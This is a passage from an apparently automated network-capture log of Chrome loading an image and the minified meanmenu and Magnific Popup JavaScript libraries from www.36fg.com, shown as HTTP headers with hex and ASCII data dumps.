                                                        2025-03-15 00:17:56 UTC1369INData Raw: 44 59 31 b2 7c e3 49 e6 5c 66 ce fd 00 c7 b1 6b d4 96 3a 1b 53 62 98 8c b3 b9 18 45 dc 02 d8 16 4f a6 85 c3 84 b1 a1 48 fb ec 27 89 24 94 7b 94 15 a0 f6 ad 08 21 c1 c9 ec 05 e4 f0 07 63 6e 25 ae 30 01 7c 7d 46 4c 92 30 82 df 3c a9 64 29 97 81 a3 c5 41 17 46 8c 38 a7 78 a2 23 2a 1a c3 d5 5a 3c 61 22 37 39 c2 1e 17 53 1f d0 b1 64 4b c6 fe 0d 22 1e e1 b2 62 45 d8 a1 0b 74 48 f4 61 21 a5 a1 b3 8e c2 96 a3 a1 3d 76 96 e5 57 78 b9 3a 6d c1 08 90 8b f8 c1 5d 47 4c f0 6e a7 0d ab b0 44 63 13 93 74 75 69 0d 87 0d 24 f2 a2 38 3d 46 b1 98 f2 89 c4 22 2a e4 c4 b2 9b 33 f7 99 e0 31 a0 8f 78 2a 2d e5 14 2e cb 6b 2c 65 86 6f 7c 2c 87 ba 12 c5 26 15 c7 c6 c4 5b c8 cb d8 8a 44 04 e6 0d ba 6d 81 a3 e2 8f e6 40 00 3b a1 78 d9 7b aa c4 d8 eb f6 84 db dd 4e 8b bc 18 f4 0a 63
                                                        Data Ascii: DY1|I\fk:SbEOH'${!cn%0|}FL0<d)AF8x#*Z<a"79SdK"bEtHa!=vWx:m]GLnDctui$8=F"*31x*-.k,eo|,&[Dm@;x{Nc
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 7b 60 14 24 63 62 04 93 c9 53 22 9b a6 f2 f2 22 75 ab 65 20 8f 0e 6d 96 21 a3 9b 1d 9a c0 aa b1 ed 24 45 93 45 8a e7 a7 70 ae 4d 0b 67 cf 49 09 de d4 fe 19 2a ce ec 23 b7 db d9 04 a1 8d eb bb 0b 2c 77 c7 fc c2 e1 a8 b0 b2 0c 37 ff 08 26 c0 cf 3c 0a d8 5b 79 06 c2 e1 ad bd 41 00 4d 6c 7d 3f 4e f8 e6 9a ee 28 e0 91 23 d5 59 ca 59 d4 e6 0a 2b 1c 18 03 76 65 bc dd ea 74 69 16 b2 fc c0 54 89 92 10 29 3c 11 31 28 a1 8b 97 af 50 a5 d2 80 7c 4f 4a 22 fb f5 ad 1a 15 0f 1e 85 9d 91 a3 b5 f2 92 28 ac 43 07 0f 52 b9 5e a3 f5 ad 1d 51 b8 29 c8 63 77 73 87 0e 42 bc 44 24 bf 63 98 48 2f 49 eb 1c 18 ee bb 92 36 0c b1 0f a5 1b a7 64 b3 47 eb b5 16 9d 5e 7e 1a e7 11 1d c0 04 9b cd 0a 15 b1 32 62 30 68 2e 9f 7e 96 72 2b ab b4 ef e8 91 ab 2c 3a ce 8d 16 cf bb 41 48 ca 0f 25
                                                        Data Ascii: {`$cbS""ue m!$EEpMgI*#,w7&<[yAMl}?N(#YY+vetiT)<1(P|OJ"(CR^Q)cwsBD$cH/I6dG^~2b0h.~r+,:AH%
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 8e 72 35 6f 14 c8 09 cf fd 10 47 76 74 e5 ac f1 4d fc f9 50 d8 2a 1c 6d 2c 18 8a 07 7a 37 26 f0 ee c6 81 bb 61 60 98 7b c3 db 86 9c ee 68 c7 ba 0d 83 a2 49 87 9f 77 0f 9d 02 3a e8 9e 7d 86 b6 5b 9e ea 46 c0 49 35 ec 5a 05 d7 b1 f8 e8 31 e4 82 8c 66 ec 9a c9 a5 24 29 92 38 7f 1a b0 70 ee f8 2d 74 e4 f6 53 3a 6c a5 8d 27 9b 23 d4 3d ea 01 d6 b5 37 b6 01 d9 80 26 c8 92 48 89 4d 11 29 b3 63 6f 9f a5 83 0a e2 79 04 02 31 70 1f af df 94 44 48 1c 2c d5 5f ec 41 35 63 09 59 59 79 4c 9e 39 39 43 2e 8e 93 20 84 14 55 3a 12 4d b7 22 d1 6f ba 92 f2 ab fe 3d 82 2b 6c f9 3e 8e a1 ef d8 08 af ea 91 fc 8c 1b 71 f0 8d 64 78 d8 07 fd 53 15 6a 60 79 aa 55 d4 aa 55 69 1a ca eb ce 57 ff 1c a5 bd 1e 45 62 b1 c0 19 ef ea d6 67 ac b0 d8 3c ef 83 ab 2d 3b 2a db 9c 6e 5f 72 67 79
                                                        Data Ascii: r5oGvtMP*m,z7&a`{hIw:}[FI5Z1f$)8p-tS:l'#=7&HM)coy1pDH,_A5cYYyL99C. U:M"o=+l>qdxSj`yUUiWEbg<-;*n_rgy


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.549759104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:56 UTC443OUTGET /images/defaultpic.gif HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC979INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:56 GMT
                                                        Content-Type: image/gif
                                                        Content-Length: 6408
                                                        Connection: close
                                                        last-modified: Mon, 30 Oct 2023 20:31:56 GMT
                                                        etag: "654012bc-1908"
                                                        expires: Sun, 13 Apr 2025 11:46:45 GMT
                                                        Cache-Control: max-age=2592000
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 45077
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4W3PCkus66dqbmgrPBlX08HJMIRAbEUWd%2Bm6dpODZB4sNC61Olpiho9nTJLLwa5sULX3jzFbVHU1YdIUF8Ts5m4dqsNu0Wi%2FaqMDo4D%2FCpIatAelUUZNzwrXf1ffEWg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a8994442e2-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1733&rtt_var=658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1015&delivery_rate=1653454&cwnd=190&unsent_bytes=0&cid=57c4ba4b9bde2733&ts=142&x=0"
                                                        2025-03-15 00:17:56 UTC390INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 01 4a 08 06 00 00 00 6b 53 e7 6d 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 18 ba 49 44 41 54 78 9c ed dd 4f 6c 9c e7 9d 1f f0 df 9b 28 11 37 31 69 ae bb 70 58 b3 0b 09 58 60 45 1d 76 2d 14 95 ac a2 07 09 d1 2e 9c 4b 21 a9 3d 24 87 5a f1 cd 40 88 c5 5e 1d fb 92 4b bc be 6e 1d 2e d0 5b 45 9d f6 d0 98 3a 1a 5b 05 d2 a1 a8 44 a2 00 73 a9 a9 43 b7 e3 45 e9 d2 bb 8b 0d a3 31 9a 09 8a cd bb 87 57 43 0d 87 33 9c 79 e7 df 3b 33 cf e7 03 d0 12 87 c3 e1 63 9b e4 ef fb fc cf 2e fe e8 37 79 00 00 49 f9 4a d5 0d 00 00 26 4f 00 00 80 04 09 00 00 90 20 01 00 00 12 24 00 00 40 82 04 00 00 48 90 00 00 00 09 12 00 00 20 41 02 00 00 24 48 00 00 80 04 09 00 00 90 20 01 00 00 12 24 00
                                                        Data Ascii: PNGIHDRJkSmpHYs+IDATxOl(71ipXX`Ev-.K!=$Z@^Kn.[E:[DsCE1WC3y;3c.7yIJ&O $@H A$H $
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 80 04 09 00 00 90 a0 33 55 37 20 35 6b df 8a 58 5b 89 58 5d ae ba 25 4c ab fd c3 88 fd 5f 46 d4 7f 15 b1 f7 45 d5 ad 61 58 4b 0b 11 2f 2d 44 2c 9d 2d 7e ee 17 17 8a c7 17 17 8a 8f 75 f2 ac 11 51 7f fe f6 ec d7 c5 63 fb 87 11 9f 1f 4e a6 cd a4 41 00 98 80 a5 85 88 b7 de c8 e2 ce d5 17 3f fc d0 af bd 83 88 4f 0f 22 76 6a 79 ec 7c 56 14 02 a6 cb d2 42 c4 6b 2f 17 e1 7e 6d 25 8b d5 e5 38 7a 1b f5 cf 7c bd 51 7c 3f d4 1b 11 7b 07 79 ec 1d 14 21 61 a7 36 da af c3 fc cb 2e fe e8 37 79 d5 8d 98 67 37 2e 44 7c 70 2b 53 f8 19 99 ed 5a c4 d6 6e 1e 3f 7b 5a f4 14 99 ac a5 85 88 0b cf 47 f2 ae 9c cf a6 6a 44 6f ef a0 08 88 db b5 3c f6 be 10 0a 38 9d 00 30 46 eb d7 b3 58 bf 56 75 2b 98 57 f5 46 c4 7f dd 8b f8 8b 47 b9 51 81 31 6a 16 fc 1b 6b d9 f3 a2 5f 75 8b ca d9 ae
                                                        Data Ascii: 3U7 5kX[X]%L_FEaXK/-D,-~uQcNA?O"vjy|VBk/~m%8z|Q|?{y!a6.7yg7.D|p+SZn?{ZGjDo<80FXVu+WFGQ1jk_u
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 37 f4 4f 15 ec 0a 18 9c 00 00 89 ab 37 22 7e b6 37 dc 6b ac 5f d7 0b a3 3a 57 ce 3b 20 68 10 02 00 24 ee c1 5e 3e d4 f0 ff ea b2 79 58 aa f7 ee 77 5c 18 54 96 00 00 89 db 78 34 dc e7 ff e0 9a e1 57 aa b7 ba 1c f1 96 b3 01 4a 11 00 20 61 5b bb f9 50 c7 ff ae 2e 5b f8 c7 f4 b8 73 d5 28 40 19 02 00 24 6c d8 de bf c5 57 4c 93 c5 05 a3 00 65 08 00 90 a8 8d 87 c3 f5 fe 2f 9f 2f 16 5f c1 34 31 0a d0 3f 01 00 12 b4 7f 18 71 ef c9 70 af b1 6e ee 9f 29 64 14 a0 7f 02 00 24 e8 bd fb c3 ad fc d7 fb 67 9a 19 05 e8 8f 00 00 89 d9 78 98 c7 4e 6d b8 d7 d0 fb 67 9a 19 05 e8 8f 00 00 09 d9 ae 0d bf f0 6f 75 59 ef 9f e9 67 14 a0 37 01 00 12 b1 7f 18 f1 fe fd e1 8f fc b5 ef 9f 59 60 14 a0 37 01 00 12 b0 7f 18 f1 f6 dd e1 56 fd 47 d8 f7 cf 6c b9 75 49 58 3d 8d 00 30 62 c3 fe
                                                        Data Ascii: 7O7"~7k_:W; h$^>yXw\Tx4WJ a[P.[s(@$lWLe//_41?qpn)d$gxNmgouYg7Y`7VGluIX=0b
                                                        2025-03-15 00:17:56 UTC1369INData Raw: bd a4 3e fc 1f 21 00 00 94 96 45 c4 ef bf 5a 75 2b 3a 5b 5c 30 fc df 8f 67 46 00 04 00 80 41 fc ce 4b c5 db b4 b9 73 35 33 fc df 87 7a c3 6d 89 02 00 40 49 f9 f3 da 71 f1 9f 57 db 8e 76 ab cb 11 b7 5e af ba 15 b3 c1 14 80 00 00 50 de f3 29 f6 57 5f 8a b8 f0 ad 6a 9b d2 ea 07 d7 f4 fe fb 35 0b 57 3a 8f 9b 00 00 30 84 3f 58 8d 78 e5 9b 55 b7 22 e2 ad ab 59 dc be 54 75 2b 66 c7 a7 ae 4b 16 00 00 86 f1 f5 af 46 7c fb 42 b5 bb 02 d6 56 22 7e f8 66 75 5f 7f 16 7d 69 11 a0 00 00 50 56 73 93 5d fe fc 9d c5 b3 11 ff f6 0f 23 96 2a 08 01 ab cb 11 1f 7d d7 b6 bf b2 3e 3d a8 ba 05 d5 13 00 00 06 94 45 14 29 20 2b 8a ff bf ff 97 59 bc 3c c1 10 b0 b6 12 f1 d3 77 cc fb 97 b5 a7 f8 47 84 00 00 50 5a de f6 d6 b4 b4 10 f1 bd cb 59 9c 7b 65 fc 6d 78 eb 6a 16 3f 7d 27 9b ea
                                                        Data Ascii: >!EZu+:[\0gFAKs53zm@IqWv^P)W_j5W:0?XxU"YTu+fKF|BV"~fu_}iPVs]#*}>=E) +Y<wGPZY{emxj?}'
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 9f 3f 66 17 40 79 5b bb b9 55 ff 23 22 00 00 94 74 6c fe bf fd 1c 80 e7 4f 68 2d fa 79 db 73 b2 cc 22 c0 41 ec 1f 46 7c f8 49 d5 ad 98 1f 02 00 40 49 ad 07 01 e5 71 62 8d 5f 44 7e 3c 17 9c 58 22 d0 3a 1d 20 08 f4 a5 de 28 e6 fd 9f 35 aa 6e c9 fc 10 00 00 4a ea b0 e6 ef c4 29 7f cd c7 8f 3d a9 f5 29 99 d1 ff 32 36 1e 99 f7 1f 35 01 00 a0 a4 63 8b f8 4f b9 11 a8 5b 81 77 08 50 39 1b 0f cd fb 8f 83 00 00 30 80 bc f5 2f 1d 7a f7 27 9e d7 b6 26 40 ef bf 3f 9b 8f 73 fb fd c7 44 00 00 28 ab 6d 4b 5f 7b 35 6f dd 05 a0 d0 0f 6e ef c0 a2 bf 71 12 00 00 ca ea d4 c3 6f fd 70 d6 36 cc 7f ca 95 c1 12 42 67 fb 87 11 7f f2 97 26 4a c6 49 00 00 18 c0 b1 ba dd 36 0d 90 e7 1d b6 f9 e5 27 df 3d 71 2a 20 11 51 14 ff b7 ef 5a f4 37 6e 02 00 40 49 59 a7 bf 9f d6 cb 6f fb 78 de
                                                        Data Ascii: ?f@y[U#"tlOh-ys"AF|I@Iqb_D~<X": (5nJ)=)265cO[wP90/z'&@?sD(mK_{5onqop6Bg&JI6'=q* QZ7n@IYox
                                                        2025-03-15 00:17:56 UTC542INData Raw: f9 6c be ff fd 06 b5 7f 18 b1 53 ab ba 15 30 1a 02 00 7d d9 78 a4 20 34 ed 1f 46 6c ed 56 dd 8a f1 da 7c 5c 04 3f 8e f3 73 c0 3c 11 00 e8 cb 4e cd d0 67 53 0a 45 a0 de 88 f8 e1 fd f9 ff f7 2c 63 bb 36 ff c1 8f b4 08 00 f4 ed bd ad 7c 6e 17 be f5 6b f3 71 9e 4c 11 f8 d9 5e 1a 61 a7 1f fb 87 11 ef 0b 44 cc 19 01 80 be d5 1b 11 6f df 4d 37 04 6c ed e6 f1 e1 27 55 b7 62 b2 36 1e 0a 01 7b 07 69 7f df 33 bf b2 8b 3f fa 4d da 3f dd 94 b6 ba 1c b1 7e 2d e2 d6 a5 ac ea a6 4c 44 bd 51 14 c1 cd c7 55 b7 a4 3a 97 cf 47 7c 70 33 8b d5 e5 aa 5b 32 39 f5 46 c4 e6 93 3c ee 3d 76 36 02 f3 49 00 60 60 97 cf 47 dc b9 9a c5 8d 0b 55 b7 64 3c ea 8d 88 8f 77 f3 b8 f7 64 7e f7 fc 97 75 eb 52 c4 8d b5 2c ae 9c 8b 58 5c a8 ba 35 e3 b1 5d 2b 76 41 28 fc cc 3b 01 80 a1 2d 2d 44 5c
                                                        Data Ascii: lS0}x 4FlV|\?s<NgSE,c6|nkqL^aDoM7l'Ub6{i3?M?~-LDQU:G|p3[29F<=v6I``GUd<wd~uR,X\5]+vA(;--D\


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.549760104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:56 UTC608OUTGET /static/js/meanmenu.min.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC996INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:56 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:38 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae7a-fb3"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 28897
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ypRyYn00wXzcE%2Bu7ZtobSYzzgFnccYEUMqRHXiZkcwCvEAk2UQ7raE%2BrbBDsTLEaPvVQdo9ingZxD1KHrlnIAoReuECDl5brGBMgP04vQrCSrZl4LX2Pg9zY1adjcps%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a89fbcae20-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2109&min_rtt=2097&rtt_var=812&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1180&delivery_rate=1327272&cwnd=102&unsent_bytes=0&cid=ca2217198de61497&ts=136&x=0"
                                                        2025-03-15 00:17:56 UTC373INData Raw: 66 62 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 24 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 24 2e 66 6e 2e 6d 65 61 6e 6d 65 6e 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 7b 6d 65 61 6e 4d 65 6e 75 54 61 72 67 65 74 3a 6a 51 75 65 72 79 28 74 68 69 73 29 2c 6d 65 61 6e 4d 65 6e 75 43 6f 6e 74 61 69 6e 65 72 3a 22 62 6f 64 79 22 2c 6d 65 61 6e 4d 65 6e 75 43 6c 6f 73 65 3a 22 58 22 2c 6d 65 61 6e 4d 65 6e 75 43 6c 6f 73 65 53 69 7a 65 3a 22 31 38 70 78 22 2c 6d 65 61 6e 4d 65 6e 75 4f 70 65 6e 3a 22 3c 73 70 61 6e 20 2f 3e 3c 73 70 61 6e 20 2f 3e 3c 73 70 61 6e 20 2f 3e 22 2c 6d 65 61 6e 52 65 76 65 61 6c 50 6f 73 69 74 69 6f 6e 3a 22 72 69 67 68 74 22 2c 6d 65 61 6e 52 65 76 65 61 6c 50 6f 73 69 74 69 6f 6e 44 69 73 74 61 6e 63 65 3a 22
                                                        Data Ascii: fb3!function($){"use strict";$.fn.meanmenu=function(e){var n={meanMenuTarget:jQuery(this),meanMenuContainer:"body",meanMenuClose:"X",meanMenuCloseSize:"18px",meanMenuOpen:"<span /><span /><span />",meanRevealPosition:"right",meanRevealPositionDistance:"
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 2b 22 2c 6d 65 61 6e 43 6f 6e 74 72 61 63 74 3a 22 2d 22 2c 6d 65 61 6e 52 65 6d 6f 76 65 41 74 74 72 73 3a 21 31 2c 6f 6e 65 50 61 67 65 3a 21 31 2c 6d 65 61 6e 44 69 73 70 6c 61 79 3a 22 62 6c 6f 63 6b 22 2c 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 73 3a 22 22 7d 3b 65 3d 24 2e 65 78 74 65 6e 64 28 6e 2c 65 29 3b 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 65 2e 6d 65 61 6e 4d 65 6e 75 54 61 72 67 65 74 2c 74 3d 65 2e 6d 65 61 6e 4d 65 6e 75 43 6f 6e 74 61 69 6e 65 72 2c 72 3d 65 2e 6d 65 61 6e 4d 65 6e 75 43 6c 6f
                                                        Data Ascii: +",meanContract:"-",meanRemoveAttrs:!1,onePage:!1,meanDisplay:"block",removeElements:""};e=$.extend(n,e);var a=window.innerWidth||document.documentElement.clientWidth;return this.each(function(){var n=e.meanMenuTarget,t=e.meanMenuContainer,r=e.meanMenuClo
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 65 72 79 28 22 2e 6d 65 61 6e 2d 62 61 72 2c 2e 6d 65 61 6e 2d 70 75 73 68 22 29 2e 72 65 6d 6f 76 65 28 29 2c 6a 51 75 65 72 79 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 6d 65 61 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 29 2c 6a 51 75 65 72 79 28 6e 29 2e 63 73 73 28 22 64 69 73 70 6c 61 79 22 2c 67 29 2c 41 3d 21 31 2c 45 3d 21 31 2c 6a 51 75 65 72 79 28 70 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 6d 65 61 6e 2d 72 65 6d 6f 76 65 22 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 22 2b 6c 2b 22 3b 63 6f 6c 6f 72 3a 22 2b 6c 2b 22 3b 22 2b 77 3b 69 66 28 6f 3e 3d 61 29 7b 6a 51 75 65 72 79 28 70 29 2e 61 64 64 43 6c 61 73 73 28 22 6d 65 61 6e 2d 72 65 6d 6f 76 65 22 29 2c 45 3d 21 30 2c 6a 51
                                                        Data Ascii: ery(".mean-bar,.mean-push").remove(),jQuery(t).removeClass("mean-container"),jQuery(n).css("display",g),A=!1,E=!1,jQuery(p).removeClass("mean-remove")},b=function(){var e="background:"+l+";color:"+l+";"+w;if(o>=a){jQuery(p).addClass("mean-remove"),E=!0,jQ
                                                        2025-03-15 00:17:56 UTC915INData Raw: 6c 61 73 73 28 22 6d 65 61 6e 2d 63 6c 69 63 6b 65 64 22 29 7d 29 29 3a 6a 51 75 65 72 79 28 22 2e 6d 65 61 6e 2d 6e 61 76 20 75 6c 20 75 6c 22 29 2e 73 68 6f 77 28 29 3a 6a 51 75 65 72 79 28 22 2e 6d 65 61 6e 2d 6e 61 76 20 75 6c 20 75 6c 22 29 2e 68 69 64 65 28 29 2c 6a 51 75 65 72 79 28 22 2e 6d 65 61 6e 2d 6e 61 76 20 75 6c 20 6c 69 22 29 2e 6c 61 73 74 28 29 2e 61 64 64 43 6c 61 73 73 28 22 6d 65 61 6e 2d 6c 61 73 74 22 29 2c 4d 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 6d 65 61 6e 63 6c 6f 73 65 22 29 2c 6a 51 75 65 72 79 28 4d 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 41 3d 3d 3d 21 31 3f 28 4d 2e 63 73 73 28 22 74 65 78 74 2d 61 6c 69 67 6e 22 2c 22 63 65 6e 74 65 72 22 29
                                                        Data Ascii: lass("mean-clicked")})):jQuery(".mean-nav ul ul").show():jQuery(".mean-nav ul ul").hide(),jQuery(".mean-nav ul li").last().addClass("mean-last"),M.removeClass("meanclose"),jQuery(M).click(function(e){e.preventDefault(),A===!1?(M.css("text-align","center")
                                                        2025-03-15 00:17:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.549762104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:56 UTC614OUTGET /static/js/magnific-popup.min.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC999INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:56 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:42 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae7e-4ef8"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 28898
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XA8iucomTnlZ6RAAAaDbd6rew7jhpYJkScPTyaJ1Wi%2BHkGiB3x5%2BF%2FJGnUofcv9n9BjA94HGWW5f8mqHsfsl00MGtS0Y7vRQRZZWogC1brZYga8MfvIbqQzgykOI02I%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a8c9acc33d-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1613&rtt_var=608&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1186&delivery_rate=1796923&cwnd=151&unsent_bytes=0&cid=a19a2936593dc1a2&ts=130&x=0"
                                                        2025-03-15 00:17:56 UTC370INData Raw: 34 65 66 38 0d 0a 2f 2a 21 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 20 2d 20 76 31 2e 31 2e 30 20 2d 20 32 30 31 36 2d 30 32 2d 32 30 0a 2a 20 68 74 74 70 3a 2f 2f 64 69 6d 73 65 6d 65 6e 6f 76 2e 63 6f 6d 2f 70 6c 75 67 69 6e 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2f 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 36 20 44 6d 69 74 72 79 20 53 65 6d 65 6e 6f 76 3b 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 61 29 3a 61 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 3a 77 69 6e
                                                        Data Ascii: 4ef8/*! Magnific Popup - v1.1.0 - 2016-02-20* http://dimsemenov.com/plugins/magnific-popup/* Copyright (c) 2016 Dmitry Semenov; */!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):win
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 22 4d 61 72 6b 75 70 50 61 72 73 65 22 2c 6d 3d 22 4f 70 65 6e 22 2c 6e 3d 22 43 68 61 6e 67 65 22 2c 6f 3d 22 6d 66 70 22 2c 70 3d 22 2e 22 2b 6f 2c 71 3d 22 6d 66 70 2d 72 65 61 64 79 22 2c 72 3d 22 6d 66 70 2d 72 65 6d 6f 76 69 6e 67 22 2c 73 3d 22 6d 66 70 2d 70 72 65 76 65 6e 74 2d 63 6c 6f 73 65 22 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 75 3d 21 21 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 76 3d 61 28 77 69 6e 64 6f 77 29 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 62 2e 65 76 2e 6f 6e 28 6f 2b 61 2b 70 2c 63 29 7d 2c 78 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 2c 65 29 7b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 72 65 74 75 72 6e 20 66 2e 63 6c 61 73 73 4e 61 6d
